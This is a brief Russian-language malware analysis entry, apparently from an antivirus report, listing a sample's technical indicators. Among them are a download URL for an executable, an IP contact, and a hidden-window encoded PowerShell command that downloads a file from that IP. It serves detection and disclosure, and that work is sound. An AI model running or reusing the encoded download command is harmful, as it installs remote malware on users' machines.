Техническая информация
- http://94.102.58.30/~trevor/winx64.exe как %appdata%\winx64.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1880
- %TEMP%\784373.cvr
- '94.##2.58.30':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADQALgAxADAAMgAuADUAOAAuA...' (со скрытым окном)